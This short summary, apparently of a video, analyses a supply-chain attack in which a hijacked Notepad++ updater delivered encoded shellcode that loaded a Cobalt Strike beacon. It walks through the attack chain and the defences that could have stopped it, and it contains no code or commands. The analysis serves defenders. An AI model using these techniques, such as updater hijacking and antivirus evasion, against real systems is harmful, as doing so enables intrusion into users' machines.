How this Popular Text Editor shipped Malware

A state-sponsored actor (likely Chinese) compromised Notepad++'s hosting provider Hostinger to hijack the WinGUp updater and deliver malware to users. The attack exploited the updater's lack of SSL certificate validation, allowing malicious download URLs to be served intermittently — making detection extremely difficult. The payload used a numeric-encoded shellcode blob to evade AV detection, ultimately loading a Cobalt Strike beacon via an Alibaba Cloud C2 server. The video walks through the full attack chain using procmon, Binary Ninja, and sandbox analysis, and discusses how endpoint tools like ThreatLocker could have blocked the anomalous curl.exe spawning behavior.